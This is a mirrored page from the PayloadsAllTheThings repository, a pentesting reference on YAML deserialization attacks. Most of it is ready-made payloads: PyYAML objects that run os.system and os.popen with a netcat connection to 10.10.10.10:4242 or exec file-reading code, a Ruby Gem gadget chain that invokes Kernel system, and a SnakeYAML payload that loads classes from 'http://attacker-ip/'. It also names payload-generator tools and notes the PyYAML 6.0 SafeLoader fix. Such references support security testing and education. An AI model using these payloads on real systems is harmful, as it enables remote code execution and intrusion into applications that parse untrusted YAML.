mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
3.2 KiB
3.2 KiB
YAML Deserialization
Summary
Tools
- j0lt-github/python-deserialization-attack-payload-generator
- artsploit/yaml-payload - A tiny project for generating SnakeYAML deserialization payloads
- mbechler/marshalsec - Java Unmarshaller Security - Turning your data into code execution
Exploit
PyYAML
!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]
!!python/object/apply:subprocess.Popen
- ls
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec
Since PyYaml version 6.0, the default loader for load
has been switched to SafeLoader mitigating the risks against Remote Code Execution.
PR fixing the vulnerabily
The vulnerable sinks are now yaml.unsafe_load
and yaml.load(input, Loader=yaml.UnsafeLoader)
with open('exploit_unsafeloader.yml') as file:
data = yaml.load(file,Loader=yaml.UnsafeLoader)
Ruamel.yaml
Ruby
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: sleep 600
method_id: :resolve
SnakeYAML
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
References
- Python Yaml Deserialization - HackTricks - July 19, 2024
- YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021
- PyYAML Documentation - PyYAML - April 29, 2006
- Blind Remote Code Execution through YAML Deserialization - Colin McQueen - June 9, 2021
- CVE-2019-20477 - 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - Manmeet Singh (@_j0lt) - June 21, 2020